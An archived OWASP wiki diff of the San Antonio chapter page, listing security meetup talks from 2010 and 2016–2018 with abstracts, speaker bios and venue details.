This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "San Antonio"

From OWASP
Jump to: navigation, search
m (minor edit)
 
(107 intermediate revisions by 8 users not shown)
Line 1: Line 1:
'''San Antonio OWASP Chapter: Wed August 18, 2010'''
+
{{Chapter Template|chaptername=San Antonio|extra=The chapter leadership team is:
  
Topic: Which Web Programming Languages are Most Secure?
+
[mailto:[email protected] Dan Cornell]
 +
[mailto:[email protected] Matt Valdes]  [mailto:[email protected] Michael Xin]
  
Presenter: Jeremiah Grossman, Founder and CTO, WhiteHat Security
+
|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-sanantonio|emailarchives=http://lists.owasp.org/pipermail/owasp-sanantonio}}
  
Date: Wednesday, August 18, 2010 11:30am – 1:00pm
+
== Local News  ==
 +
Please see https://www.meetup.com/OWASP-San-Antonio/ for the most up to date chapter meeting schedule
  
Location:
+
=== '''OWASP San Antonio - November 9, 2018 @ 11:30am''' ===
San Antonio Technology Center (Web Room)
+
Join us for the November 2018 OWASP San Antonio meeting!
3463 Magic Drive
 
San Antonio, TX 78229
 
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
 +
We will have an interesting talk covering strategies and benefits of application tracing!
  
Abstract:
+
'''Title:'''
Security-conscious organizations make implementing a software security development lifecycle a priority. As part of the process, they evaluate a large number of development technologies for building websites. The assumption by many is that not all development environments are created equal. So the question often asked is, “What is the most secure programming language or development framework available?”
+
 
 +
Tracing your system for fun and profit
 +
 
 +
'''Abstract:'''
 +
 
 +
How many of us go in every day knowing the ins and outs of our application but not fully understanding how interacts within the greater system flow? How often do we get called up at night from a frantic developer three dependencies away from our application yelling about a response that they did not expect due to a bug fix we put in a few weeks earlier? As developers, that happens more often than we care to admit. Having something that shows an entire system workflow is monumental. On top of that, security professionals would also benefit from understanding how different parts of the system interact with each other.
 +
 
 +
There have been many ways to solve this problem (design documents, architecture designs, workflow system documents, etc.) but most uses require manual updates and dedicated resources that know the entire system flow to understand what to update. This is not (usually) scalable.
 +
 
 +
Tracing cross-boundary systems looks to help solve these issues. In this talk, we’ll talk about one way of tracing a system end-to-end (OpenTracing) and will talk about benefits to security professionals, look at implementation details, talk about other competing products in this space, and next steps in the ecosystem. The goal for this talk is for the attendees to leave with a rudimentary understanding of system tracing and potential benefits and drawbacks
 +
 
 +
'''Speaker:''' Dimitry Ushakov
 +
 
 +
'''Bio:'''
 +
 
 +
Dimitry Ushakov is a Quality Engineer at Rackspace. When not dealing with impostor syndrome from working with geniuses every day, he works on making operators' and developers' lives easier with test automation, continuous integration/delivery management, and other testing industry buzzwords.
 +
 
 +
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
 +
 
 +
==='''OWASP San Antonio - October 5, 2018 @ 11:30am''' ===
 +
Join us for the October 2018 OWASP San Antonio meeting where we will have a talk covering the latest in DDoS attack tools and services!
 +
 
 +
'''Title:'''
 +
 
 +
Weapons of Mass Disruption
 +
 
 +
'''Abstract:'''
 +
 
 +
We now live in a world where individuals or groups of individuals hold the same destructive power that only nation states once held. For as little as a couple of dollars an hour, fortune 500 companies and even nation states have been wiped off the Internet. The emergence of professional DDoS services is changing the threat landscape of the Internet once again. We'll take a look at DDoS tools and services and what we can do to combat them.
 +
 
 +
'''Speaker:''' Roman Lara
 +
 
 +
'''Bio:'''
 +
 
 +
Roman Lara is a Senior Engineer on Rackspace’s specialized DDoS Team and has been a Racker in various roles since 2009. He is responsible for driving the design, build, and maintenance of Rackspace's DDoS Mitigation infrastructure and services. Roman is a high-energy, hands-on leader who’s knowledge and experience of threat trends help develop and create powerful mitigation strategies through Fanatical Support. He earned a degree in Business from the University of Texas in San Antonio.
 +
 
 +
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
 +
 
 +
The slide link: https://www.slideshare.net/michaelxin2015/weapons-of-mass-disruption-by-roman-lara-for-owasp-san-antonio-chapter-meetup
 +
 
 +
==='''OWASP San Antonio - June 29, 2018 @ 11:30am''' ===
 +
Join us for the June 2018 OWASP San Antonio meeting where we will have a talk covering how to evaluate threats to IoT devices and their related systems!
 +
 
 +
'''Title:'''
 +
 
 +
Threat Modeling for IoT Systems
 +
 
 +
'''Abstract:'''
  
 +
The Internet of Things (IoT) is an exciting and emerging area of technology allowing individuals and businesses to make radical changes to how they live their lives and conduct commerce. The challenge with this trend is that IoT devices are just computers with sensors running applications. Because IoT devices interact with our personal lives the proliferation of these devices exposes an unprecedented amount of personal sensitive data to significant risk. In addition, IoT security is not only about the code running on the device. These IoT devices are connected to systems that include supporting web services as well as other client applications that allow for management and reporting.
  
Clearly, familiarity with a specific product, whether it is designed to be secure-by-default or must be configured properly, and whether various libraries are available, can drastically impact the outcome. Still, conventional wisdom suggests that most popular modern languages / frameworks (commercial & open source) perform relatively similarly when it comes to an overall security posture. At least in theory, none is markedly or noticeably more secure than another. Suggesting PHP, Java, C# and others are any more secure than other frameworks is sure to spark heated debate.
+
A critical step to understanding the security of any system is building a threat model. This helps to enumerate the components of the system as well as the paths that data takes as it flows through the system. Combining this information with an understanding of trust boundaries helps provide system designers with critical information to mitigate systemic risks to the technology and architecture. This presentation looks at how Threat Modeling can be applied to IoT systems to help build more security systems during the design process, as well as how to use Threat Modeling when testing the security of IoT systems.
  
 +
'''Speaker:''' Dan Cornell
  
As has been said in the past, “In theory, there is no difference between theory and practice. But, in practice, there is.” Until now, no website security study has provided empirical research measuring how various Web programming languages / frameworks actively perform in the field. To which classes of attack are they most prone, how often and for how long; and, how do they fare against popular alternatives? Is it really true that popular modern languages / frameworks yield similar results in production websites?
+
'''Bio:'''
  
 +
A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.
  
By analyzing the vulnerability assessment results of nearly 1,700 websites under WhiteHat Sentinel management, we may begin to answer some of these questions. These answers may enable the website security community to ask better and deeper questions, which will eventually lead to more secure websites. Organizations deploying these technologies can have a closer look at particularly risk-prone areas; software vendors may focus on areas found lacking; and, developers will increase their familiarity with the strength and weaknesses of their technology stack. All of this is vitally important because security must be baked into development frameworks and be virtually transparent. Only then will application security progress be made.
+
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
  
 +
=== '''OWASP San Antonio - March 30, 2018 @ 11:30am''' ===
 +
Join us for the March 2018 OWASP San Antonio meeting!
  
Presenter Bio:
+
We will have a talk covering methods and techniques used when attacking authentication in web apps.
Jeremiah Grossman founded WhiteHat Security in August 2001.
 
  
 +
'''Title:'''
  
A world-renowned expert in Web security, Mr. Grossman is a founder of the Web Application Security Consortium (WASC), and was named to InfoWorld's Top 25 CTOs for 2007.
+
Attacking Authentication in Web Applications Abstract:
  
 +
Broken authentication is an ongoing issue, identified in the OWASP Top 10 2013 and 2017 (A2 in both). While broken authentication can span multiple topics, this presentation focuses mainly on attacking single factor authentication using usernames and passwords. Methods and techniques will be discussed to perform reconnaissance, username enumeration, account lockout bypass, and various password attacks against web applications. Speaker: Jake Miller
  
Mr. Grossman is a frequent speaker at industry events including the Black Hat Briefings, RSA Conference, ISACA, CSI, InfoSec World, OWASP, ISSA, and Defcon as well as a number of large universities. He has authored dozens of articles and white papers, is credited with the discovery of many cutting-edge attack and defensive techniques and is a co-author of XSS Attacks: Cross Site Scripting Exploits and Defense.
+
'''Bio:'''
  
 +
Jake is a penetration tester for Blue Canopy (Jacobs Engineering Group), primarily focusing on web application security. Prior to penetration testing, he was a Security Controls Assessor, a SOC analyst, and a Navy Submariner. He blogs about security on <nowiki>https://laconicwolf.com</nowiki>, writes a fair amount of Python and PowerShell code on <nowiki>https://github.com/laconicwolf</nowiki>, and occasionally tweets (@laconicwolf). Aside from security and coding, he enjoys spending time with his family and participating in ultra-running and obstacle races.
  
Mr. Grossman is frequently quoted in major media outlets such as USA Today, the Washington Post, The Financial Times, InformationWeek, InfoWorld, USA Today, PC World, Dark Reading, SC Magazine, CNET, CSO and NBC news. He frequently alerts the media community to the latest attacks and is not only able to offer in-depth commentary, but also provide his perspective of what’s to come.
+
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
  
 +
=== '''OWASP San Antonio - February 23, 2018 @ 11:30am''' ===
 +
Join us for the February 2018 OWASP San Antonio meeting!
  
Mr. Grossman was named a “friend of Google” and is also an influential blogger (www.jeremiahgrossman.blogspot.com) who offers insight and encourages open dialogue regarding current research and vulnerability trend information.
+
We will have a talk covering the complexities of secrets management and how one enterprise met the challenge​.
  
 +
'''Title''': Hashicorp Vault in the Enterprise​
  
Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo! responsible for performing security reviews on the company's hundreds of websites. Before Yahoo!, Mr. Grossman worked for Amgen, Inc.
+
'''Abstract''':
  
 +
As established enterprises move to embrace automation, securing the secrets that are required for applications to run presents challenges. How can automation be introduced to legacy application deployment models? What capabilities are needed to support modern application architectures? This presentation will review some of the discoveries made while researching these challenges from an enterprise perspective and describe at a high level how HashiCorp Vault can be a way to address them.
  
Sodas and snacks will be provided.  Feel free to bring a brown-bag lunch.
+
'''Speaker''': Mike Thurmond
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
+
'''Bio''':
  
 +
Mike Thurmond is an Information Security Architect at H-E-B. Mike has 15+ years of experience developing, deploying and managing security tools and practices in large enterprises. His experience includes developing and managing authentication systems, developing customized security services, developing and running compliance programs, and integrating security into an agile development SDLC.
  
 +
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
  
{{Chapter Template|chaptername=San Antonio|extra=The chapter leader is [mailto:[email protected] Dan Cornell]
+
=== '''OWASP San Antonio - January 26, 2018 @ 11:30am''' ===
<paypal>San Antonio</paypal>
+
Join us for the January 2018 OWASP San Antonio meeting! 
|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-sanantonio|emailarchives=http://lists.owasp.org/pipermail/owasp-sanantonio}}
 
  
== Local News ==
+
We will have a great talk about heap-related attacks and prevention methods​.
'''San Antonio OWASP Chapter: Fri. August 13, 2010'''
 
  
Topic: 1)How OWASP Works and Guided Tour of OWASP Projects / 2) Using the O2 Platform to Consume OWASP projects
+
Speaker: Tongping Liu
  
Presenter: Dinis Cruz
+
Bio:
  
Date: Friday, August 13, 2010, 2010 11:30am – 1:00pm
+
Tongping Liu is an Assistant Professor at the University of Texas at San Antonio. He got his Ph.D. from the University of Massachusetts Amherst in 2014. His research spans runtime systems, operating systems, programming languages, compiler, and distributed systems. His primary research goal is to practically improve the performance, reliability and security of parallel software. His work appeared in most prestigious system conferences, such as SOSP, OSDI, EuroSys, and CCS. He has been awarded 2015 Google Faculty Research Award and Mozilla Research Grant.
  
Location:
+
Title:
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
 +
​FreeGuard: A Faster Secure Heap Allocator​
  
 
Abstract:
 
Abstract:
1) How OWASP Works and Guided Tour of OWASP Projects - This presentation will focus on my experience in getting things done at OWASP, what resources are available and what types of initiatives should the local chapters be doing. In addition to a quick overview of a number of key OWASP projects, this talk will also provide a tutorial on how the OWASP WIKI (MediaWiki based) can be used as a database (using the MediaWiki templates technology)
 
  
2) Using the O2 Platform to Consume OWASP projects - This presentation will focus on how to consume the OWASP Wiki and a number of OWASP projects using the OWASP O2 Platform. The O2 Platform has powerful technology and capabilities for both BlackBox and WhiteBox analysis and this presentation will provide examples on how to use O2 with: WebGoat, WebScarab, Code Crawler, Dir Buster,  Testing Guide, Code Review Guide and OpenSAMM
+
In spite of years of improvements to software security, heap-related attacks still remain a severe threat. One reason is that many existing memory allocators fall short in a variety of aspects. For instance, performance-oriented allocators are designed with very limited countermeasures against attacks, but secure allocators generally suffer from significant performance overhead, e.g., running up to 10x slower.
  
The O2 Platform is focused on automating application security knowledge and workflows. It is specifically designed for developers and security consultants to be able to perform quick, effective and thorough 'source-code-driven' application security reviews (BlackBox + WhiteBox). In addition to the manual findings created/discovered by security consultants, the OWASP O2 Platform allows the easy consumption of results from multiple OWASP  projects and commercial scanning tools. This allows security consultants to find, exploit and automate (via Unit Tests) security vulnerabilities usually dismissed by the community as impossible to find/recreate. More importantly, it provides the Security Consultants a mechanism to: a) 'talk' with developers (via UnitTest) , b) give developers a way to replicate + "check if it's fixed" the vulnerabilities reported and c) engage on a two-way conversion on the best way to fix/remediate those vulnerabilities.
+
This ​talk will introduce FreeGuard, a secure memory allocator that prevents or reduces a wide range of heap-related security attacks, such as heap overflows, heap over-reads, use-after-frees, as well as double and invalid frees. FreeGuard has similar performance to the default Linux allocator, with less than 2% overhead on average, but provides significant improvement to security guarantees.
  
 +
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
Presenter Bio:
+
=== '''OWASP San Antonio - November 17, 2017 @ 11:30am''' ===
Dinis Cruz is a Security Consultant based in London (UK) and specialized in: ASP.NET/J2EE Application Security, Application Security audits and .NET Security Curriculum Development.
+
Join us for the November 2017 OWASP San Antonio meeting! 
For the past years Dinis has focused on the field of Static Source Code analysis, from May 2007 to Dec 2009 he worked as a independent consultant for Ounce Labs (bought by IBM in July 2009) where during active security engagements using Ounce's technology he developed the Open Source codebase which now is the foundation of the OWASP O2 Platform.
 
Dinis is currently focused on making the O2 Platform the industry standard for consuming, instrumenting and data-sharing between the multiple WebAppSec tools, the Security consultants and the final developers.
 
Dinis is a also active trainer on .Net security having written and delivered courses for IOActive, Foundstone, Intense School and KPMG (at multiple locations including BlackHat), and has delivered a number of presentations and keynote speeches at multiple OWASP and Security related conferences
 
At OWASP, Dinis is the leader of the OWASP O2 Platform project, member of the OWASP Global Projects Committee, chair of the OWASP Connections Committee and member of the OWASP  
 
  
 +
We will have a great talk about optimizing AppSec programs with instrumentation and sensors.
  
Sodas and snacks will be provided.  Feel free to bring a brown-bag lunch.
+
Speaker: Girish Nair
  
 +
Bio:
 +
Girish Nair has been a software developer for more than two decades. He has special interest in web related technologies and application security. He has a Master’s degree in computer science, and is a CISSP. He currently works for Contrast Security, where he evangelizes their technology.
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
+
Title:  
 +
Using Instrumentation and Sensors to drive Optimization in your Application Security Program
  
 +
Abstract:
 +
In our physical world, we have instrumentation all around us. Clocks tell us time, kitchen ovens tell us temperature, cars tell us speed and fuel level, and even have onboard health diagnostics. At our homes, we have security alerts when someone trespasses our property or opens a door. However, in the world of software, we have very little visibility into what is going on inside the software. Our presenters will describe how instrumentation can be used to enable your software applications to both detect vulnerabilities and block attacks.  Furthermore, they will demonstrate the insights offered by using instrumentation and why this approach can offer unique insights to your security program.
  
 +
@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232
  
'''San Antonio OWASP Chapter: Wed July 21, 2010'''
+
=== '''OWASP San Antonio - October 27, 2017 @ 11:30am''' ===
  
Topic: A Caching Technique (PHP Implementation)
+
=== Join us for the October 2017 OWASP San Antonio meeting! ===
 +
We will have a talk about DNS Exfiltration Techniques and Methods.
  
Presenter: Dan Ross, VP Engineering, PIC Business Systems
+
Speaker: Nolan Berry
  
Date: Wednesday July 19, 2010 11:30am – 1:00pm
+
Bio:  
 +
Nolan has been working at Rackspace for close to 5 years focusing on linux and has a strong passion for security. He is on the DNS Engineering team and has spoken at various conferences and places about DNS exfiltration and botnet control structures.
  
Location:
+
Title:  
San Antonio Technology Center (Web Room)
+
DNS Exfiltration Techniques and Methods
3463 Magic Drive
 
San Antonio, TX 78229
 
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
 +
Abstract:
 +
This presentation will show various methods of DNS exfiltration to move data out of networks and into networks with varying levels of detectability and talk about why DNS presents a monitoring and security issue to modern systems engineers looking to secure their infrastructure. We will discuss how to detect, but also how to execute this from a red team.
  
Abstract:
+
@Denim Group
Reduce 304's and improve web application performance.  A caching technique is demonstrated using PHP. Easy implementation as well as caching override are discussed.
+
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
 +
 
 +
=== '''OWASP San Antonio - September 29, 2017 @ 11:30am''' ===
 +
Join us for the September 2017 OWASP San Antonio meeting!  
  
 +
We will have a talk about how billion dollar enterprises manage application security at scale.
  
Presenter Bio:
+
Speaker: Brandon Triance-Haldane
Dan Ross has been VP Engineering for over 20 years at PIC Business Systems, which provides integrated business software for the several industries. He has led the design, development, and maintenance of many commercial web applications and programs. He has a BS in Industrial Engineering from St. Mary's University in San Antonio.
 
  
Sodas and snacks will be provided. Feel free to bring a brown-bag lunch.
+
Bio:
 +
Brandon Triance-Haldane is a Solution Architect at Security Compass; he has been delivering high quality solutions to his clients for more than six years. Brandon holds a bachelor's degree in English literature as well as an advanced diploma in Computer Security & Investigations. In his spare time, Brandon likes making music, writing code, and following the Toronto Blue Jays.
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
+
Title:  
 +
How Billion Dollar Enterprises Manage Application Security at Scale
  
 +
Abstract:
 +
Security Compass recently completed a comprehensive research study by surveying companies across multiple industries with the goal of discovering how large, complex organizations address application security at scale.  The majority of respondents surveyed were multinational organizations who reported annual earnings greater than $1 billion USD.  Through this new research study, we have gleamed novel insights on how large organizations manage application security at scale.  Through this presentation, we will reveal aggregated insights, industry trends, and best practices that illuminate how organizations are addressing application security at scale, so that you may apply and compare these learnings to the state of application security at your own organization.
  
 +
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
'''San Antonio OWASP Chapter: Wed June 16, 2010'''
 
  
Topic: Securing Software Applications Using Dynamic Dataflow Analysis
+
'''OWASP San Antonio - August 25, 2017 @ 11:30am'''
  
Presenter: Steve Cook, Senior Research Analyst, SwRI
+
Join us for the August 2017 OWASP San Antonio meeting! 
  
Date: Wednesday June 16, 2010 11:30am – 1:00pm
+
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
Location:
+
We will have a talk about Serverless Security!
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
  
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
+
Speaker: Geva Solomonovich, COO Snyk
  
 +
Title:
 +
Serverless Security: What’s Left To Protect?
  
 
Abstract:
 
Abstract:
In this presentation, we present an ongoing research effort that ensures that a wide variety of user-defined security policies are enforced on executing C programs while keeping runtime overhead low and with little disruption to the development process by leveraging Dynamic Dataflow Analysis (DDFA).  The DDFA system is built upon the Broadway static data flow analysis and error checking system, which is a source-to-source translator for C developed by the computer sciences department at the University of Texas at Austin (UT-Austin). UT-Austin and the Southwest Research Institute (SwRI) recently collaborated to further enhance the system through a government research project funded by Intelligence Advanced Research Projects Activity (IARPA) and a SwRI internal research project.
+
Serverless means handing off server management to the cloud platforms – along with their security risks. With the “pros” ensuring our servers are patched, what’s left for application owners to protect? As it turns out, quite a lot. This talk discusses the aspects of security serverless doesn’t solve, the problems it could make worse, and the tools and practices you can use to keep yourself safe.
 +
 
 +
 
 +
'''OWASP San Antonio - July 21, 2017 @ 11:30am'''
 +
 
 +
Join us for the July 2017 OWASP San Antonio meeting!  
  
The system works by automatically instrumenting the original source, guided by the security policy, with DDFA runtime library calls.  The modified program is then compiled for the platform of choice so that its security policy can be enforced at runtime through the DDFA runtime library.
+
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
The runtime overhead is kept low by leveraging the semantic information provided by the security policy and a sophisticated dependence analysis to enable optimizations beyond standard compiler techniques.  This results in a program that is instrumented with additional code only where provably necessary, so innocuous flows of data are not tracked at runtime.
+
We will have a talk comparing the internet to the US Interstate System, and what this means to the future of information security.
  
Disruption to the development process is minimized through the security policy specification.  The security policy is defined once by a security expert using a simple language, which has a direct mapping to the application programming interface to which the program is written. The policy, once defined, can be applied to many different programs. The DDFA approach is easily integrated into the development workflow, adding only an additional compilation step before application deployment.
+
Speaker: Damon Small
  
The system does not require any modification to the original source code by the programmer, and does not require hardware or operating system changes. In the future, our system can be extended to handle multiple languages and complement new security solutions.
+
Bio:
 +
Damon Small began his career studying music at Louisiana State University. Pursuing the changing job market, he took advantage of computer skills learned in the LSU recording studio to become a systems administrator in the mid-1990s. Over the past 16 years as a security professional he has supported InfoSec initiatives in the healthcare, defense, aerospace, and oil and gas industries. In addition to his Bachelor of Arts in Music, Damon completed the Master of Science in Information Assurance degree from Norwich University in 2005. His role as Technical Director includes working closely with NCC Group consultants and clients in delivering complex security assessments that meet varied business requirements.
  
Presenter Bio:
+
Title:
Steve Cook is a senior research analyst in the System Security and High Reliability Software section at the SwRI. His background and expertise are in distributed and parallel computing, compilers, as well as object-oriented and generic programming. He received his master’s degree in computer science from Texas A&M University. While at Texas A&M, he worked as a research assistant for Dr. Bjarne Stroustrup, creator of the C++ Programming Language, where he helped develop a new approach to writing concurrent programs that allows programmers to quickly turn a sequential C++ program into a parallel one that is race and deadlock free.
+
Connections: Eisenhower and the Internet
  
 +
Abstract :
 +
The speaker researches the history of one large, government-funded infrastructure and compares it to another. Specifically, the Eisenhower Interstate System and the Internet. "Connections: Eisenhower and the Internet" explores what the logistical challenges of moving vehicles across the Country can teach us about cybersecurity. Although these two topics seem unrelated, the speaker will take the audience on a journey that begins with early 20th century road-building projects, travels through ARPANET and the commercialization of the Internet, and arrives at current-day cyberspace. These two massive infrastructures have changed the world, and there are important lessons that the former can teach about the latter. The presentation concludes with predictions about the future of the Information Superhighway and how information security professionals can prepare.
  
Sodas and snacks will be provided.  Feel free to bring a brown-bag lunch.
 
  
Please RSVP: E-mail owasprsvp@denimgroup.com  or call (210) 572-4400.
+
'''OWASP San Antonio - June 30, 2017 @ 11:30am'''
  
 +
Join us for the June 2017 OWASP San Antonio meeting! 
  
 +
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
 +
We will have a talk about testing infrastructure code.
  
 +
Speaker: Dimitry Ushakov
  
'''San Antonio OWASP Chapter: Wed May 19th, 2010'''
+
Bio:  
 +
Dimitry Ushakov is a Quality Engineer at Rackspace.  When not dealing with impostor syndrome from working with geniuses every day, he works on making operators' and deveopers' lives easier with test automation, continuous integration/delivery management, and other testing industry buzzwords.
  
Topic: The Open Software Assurance Maturity Model
+
Title:  
 +
Testing Infrastructure Code
  
Presenter: Dan Cornell, Principal, Denim Group
+
Abstract:  
 +
Whether you subscribe to TDD or like to write all your tests after all the development's complete, we can all agree that testing application code is a great idea. While we do a very good job in validating that our application works, we rarely give as much love to our infrastructure code. Infrastructure testing allows us to validate the hardware, software dependencies, and system configurations will work when deploying to a target environment without actual need for deployment (most of the time).
  
Date: Wednesday May 19th, 2010 11:30am – 1:00pm
+
In this talk, we'll define what we mean by infrastructure as code and infrastructure testing.  We’ll use the ecosystem one of the major players in this area, Chef, to take a look at the tooling available to properly unit, static analysis, integration test, and compliance/security test our infrastructure.
  
Location:
+
In the second part of the talk, we'll work through a demo application, applying that tooling to build a truly CI/CD pipeline.
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
  
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
Abstract:
+
'''OWASP San Antonio - May 26, 2017 @ 11:30am'''
The Open Software Assurance Maturity Model (SAMM) (http://www.opensamm.org/) is a flexible and prescriptive framework for building security into a software development organization. Covering more than typical SDLC-based models for security, SAMM enables organizations to self-assess their security assurance program and then use recommended roadmaps to improve in a way that's aligned to the specific risks facing the organization. Beyond that, SAMM enables creation of scorecards for an organization's effectiveness at secure software development throughout the typical governance, development, and deployment business functions. Scorecards also enable management within an organization to demonstrate quantitative improvements through iterations of building a security assurance program.  
+
 
 +
Join us for the May 2017 OWASP San Antonio meeting! 
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
 +
 
 +
We will have a talk about adding security to your software procurement process.
 +
 
 +
Speaker: Kevin Dunn
  
This workshop will introduce the SAMM framework and walk through useful activities such as assessing an assurance program, mapping an existing organization to a recommended roadmap, and iteratively building an assurance program. Time allowing, additional case studies will also be discussed. OpenSAMM is an open a free project and has recently been donated to the Open Web Application Security Project (OWASP) Foundation. For more information on OpenSAMM, visit http://www.opensamm.org/.
+
Bio:
 +
Kevin Dunn is Senior Vice President for Consultancy for NCC Group. Kevin has been a professional security consultant for over 15 years, working on diverse projects and challenging technologies for the world’s largest and most demanding companies. His current responsibilities include delivering security consultancy while managing a talented highly technical team of Pentesters. Kevin works closely with Fortune 100 companies, covering Oil & Gas, Finance and Software sectors, developing strategic security assessment and advisory services for NCC Group brands from his office base of operations in Austin, TX. Over his career, he has worked on lots of physical penetration tests, site audits, and design or implementation projects for physical security.
  
Presenter Bio:
+
Title:  
Dan Cornell has over ten years of experience architecting, developing and securing web-based software systems. As a Principal of Denim Group, he leads the organization’s technology team overseeing methodology development and project execution for Denim Group’s customers. He also heads the Denim Group application security research team, investigating the application of secure coding and development techniques to the improvement of web based software development methodologies. He is also the primary author of sprajax, Denim Group’s open source tool for assessing the security of AJAX-enabled web applications
+
It Was Broken When It Got Here! Security in your Software Procurement Process
  
 +
Abstract:
 +
In 2017, Software Security is reasonably well understood. Thanks to the hard work of organizations like MITRE, OWASP, BSIMM, Microsoft, OpenSAMM and others, we have moved to a much better software security landscape when compared to 10+ years ago. Of course vulnerabilities still exist, and are found with regularity, but these are typically addressed quickly and competently by the big software vendors. For example a new critical vulnerability in Windows will be fixed by Microsoft and patched efficiently in most enterprises in a matter of days to weeks. Most recently Google managed to fix an OAUTH vuln being exploited in a mass-phishing exercise in a matter of hours! But what about everything else you install in your company or use as a service? Not all product vendors have the same level of understanding or approach to security, and not all software is under the constant scrutiny of an operating system or widespread authentication mechanism.
  
Sodas and snacks will be provided. Feel free to bring a brown-bag lunch.
+
As organizations we buy and install lots of third party software, ranging from desktop applications through to entire platforms or appliances. Who is checking that software is free of simple vulnerabilities? This issue of security for Commercial Off-The-Shelf (COTS) software, or Free and Open Source Software (FOSS), is often a complicated one. In this talk, we'll look at some case-studies of vulnerabilities found during penetration tests that were then used to forge compromises of companies. In each case, the flaws discovered and exploited had been within the products for a significant amount of time, providing a potential backdoor into the company's internal network or data.
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
+
The session will culminate in advice and guidance for how to ensure that security is not an after-thought when purchasing new enterprise products for your company.
  
  
 +
'''OWASP San Antonio - January 27, 2017 @ 11:30am'''
  
  
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
  
  
 +
Join us for the January 2017 OWASP San Antonio meeting! 
  
'''San Antonio OWASP Chapter: Wed March 17, 2010'''
 
  
Topic:  Protecting Your Applications: How to Secure Business Critical Applications from Time Bombs, Backdoors & Data Exfiltration
+
We will have a talk about integrating Security into DevOps pipelines through the use of attack surface monitoring.
  
Presenter:  Clint Pollock
 
  
Date: Wednesday, March 17th, 2010 11:30am – 1:00pm
+
Speakers: Dan Cornell
  
Location: San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
  
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
+
Bios: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.
  
Sponsored by: VERACODE   
 
  
Abstract:
+
Title: Monitoring Application Attack Surface to Integrate Security into DevOps Pipelines
With the increasing practice of outsourcing and using 3rd party libraries, it is nearly impossible for an enterprise to identify the pedigree and security of the software running its business critical applications. As a result backdoors and malicious code are increasingly becoming the prevalent attack vector used by hackers.
 
Whether you manage internal development activities, work with third party developers or are developing a COTS application for enterprise, your mandate is clear- safeguard your code and make applications security a priority for internal and external development teams.
 
In this session we will cover;
 
·    Prevalence of backdoors and malicious code in third party attacks
 
·    Definitions and classifications of backdoors and their impact on your applications
 
·    Methods to identify, track and remediate these vulnerabilities
 
  
Presenter Bio:
 
Clint Pollock is a Senior Solutions Architect at Veracode. Since 1997, he has also created security solutions for large-scale enterprise environments on behalf of CREDANT Technologies and Netegrity. In his current role, Clint helps globally distributed organizations evaluate, track, and mitigate their online business risk.  Clint’s greatest strengths are his enthusiasm, experience and determination to help customers succeed in maintaining secure, compliant systems, and avoid the consequences and bad headlines that come with application security breaches.  Clint resides in Chicago, IL.
 
  
 +
Abstract: A web application’s attack surface is the combination of URLs it will respond to as well as the inputs to those URLs that can change the behavior of the application. Understanding an application’s attack surface is critical to being able to provide sufficient security test coverage, and by watching an application’s attack surface change over time security and development teams can help target and optimize testing activities.
  
FREE PIZZA will be provided, courtesy of our friends from Veracode.
+
This presentation looks at methods of calculating web application attack surface and tracking the evolution of attack surface over time. In addition, it looks at metrics and thresholds that can be used to craft policies for integrating different testing activities into Continuous Integration / Continuous Delivery (CI/CD)
 +
pipelines for teams integrating security into their DevOps practices.
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
 
  
 +
https://www.meetup.com/OWASP-San-Antonio/events/236883708/
  
  
  
'''Meeting Schedule for 2010'''
+
'''OWASP San Antonio - August 26, 2016 @ 11:30am'''
  
